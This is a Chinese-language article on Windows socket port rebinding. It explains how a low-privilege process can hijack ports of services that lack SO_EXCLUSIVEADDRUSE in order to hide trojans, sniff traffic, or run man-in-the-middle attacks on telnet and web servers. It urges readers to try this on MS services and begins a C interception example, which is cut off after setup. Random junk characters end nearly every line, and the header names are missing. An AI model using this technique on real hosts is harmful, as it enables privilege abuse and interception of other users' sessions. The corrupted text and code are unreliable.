在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是: uDpCW}
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); ~1v5H]T{
ix]t>2r
saddr.sin_family = AF_INET; S(
r Fa
u4a(AB>S
saddr.sin_addr.s_addr = htonl(INADDR_ANY); 8/dx)*JCq
u:f.g?!`"
bind(s,(SOCKADDR *)&saddr,sizeof(saddr)); 4R/cN'-
"?UBW5nM#
其实这当中存在在非常大的安全隐患,因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分,也就是说低级权限的用户是可以重绑定在高级权限如服务启动的端口上的,这是非常重大的一个安全隐患。 fSFb)+
g",htYoEnj
这意味着什么?意味着可以进行如下的攻击: [~<X|_LG
U6@Hgi>
1。一个木马绑定到一个已经合法存在的端口上进行端口的隐藏,他通过自己特定的包格式判断是不是自己的包,如果是自己处理,如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。 A7qKY-4B
.v{ok,&
2。一个木马可以在低权限用户上绑定高权限的服务应用的端口,进行该处理信息的嗅探,本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求,但其实利用SOCKET重绑定,你可以轻易的监听具备这种SOCKET编程漏洞的通讯,而无须采用什么挂接,钩子或低层的驱动技术(这些都需要具备管理员权限才能达到) o1kY|cnGH
mew,S)dq!
3。针对一些的特殊应用,可以发起中间人攻击,从低权限用户上获得信息或事实欺骗,如在guest权限下拦截telnet服务器的23端口,如果是采用NTLM加密认证,虽然你无法通过嗅探直接获取密码,但一旦有admin用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过SOCKET发送高权限的命令,到达入侵的目的。 9c@."O`
+bw>9VmG
4.对于构建的WEB服务器,入侵者只需要获得低级的权限,就可以完全达到更改网页目的,很简单,扮演你的服务器给予连接请求以其他信息的应答,甚至是基于电子商务上的欺骗,获取非法的数据。 LJAqk2k
hc;8Vsa
其实,MS自己的很多服务的SOCKET编程都存在这样的问题,telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击,在低权限用户上实现对SYSTEM应用的截听。包括W2K+SP3的IIS也都一样,那么如果你已经可以以低权限用户入侵或木马植入的话,而且对方又开启了这些服务的话,那就不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。 RrGFGn{
MIJ^n(-G
解决的方法很简单,在编写如上应用的时候,绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址,而不允许复用。这样其他人就无法复用这个端口了。 0qj:v"~Q
#r}O =izi
下面就是一个简单的截听ms telnet服务器的例子,在GUEST用户下都能成功进行截听,剩余的就是大家根据自己的需要,进行一些特殊剪裁的问题了:如是隐藏,嗅探数据,高权限用户欺骗等。 _3YuPMaN
M3U*'A\
#include r{T}pc>^
#include k_hV.CV
#include M_wj>NXZ
#include #DI%l`B
DWORD WINAPI ClientThread(LPVOID lpParam); yIL6Sb
int main() z_^Vgb]
{ MM*B.y~TxZ
WORD wVersionRequested; .A. VOf_
DWORD ret; As;@T$G
WSADATA wsaData; 5QR=$?K
BOOL val; zMf.
SOCKADDR_IN saddr; vO#=]J8`
SOCKADDR_IN scaddr; L:ox$RU
int err; $6evK~
SOCKET s; M(alc9tn
SOCKET sc; ju-tx
:
int caddsize; 1sqBBd"=PY
HANDLE mt; j[Y$)HF
DWORD tid; '51 8S"T @
wVersionRequested = MAKEWORD( 2, 2 ); axSJ:j8
err = WSAStartup( wVersionRequested, &wsaData ); .BR2pf|R
if ( err != 0 ) { Ip0~
printf("error!WSAStartup failed!\n"); Mbua!m(0
return -1; <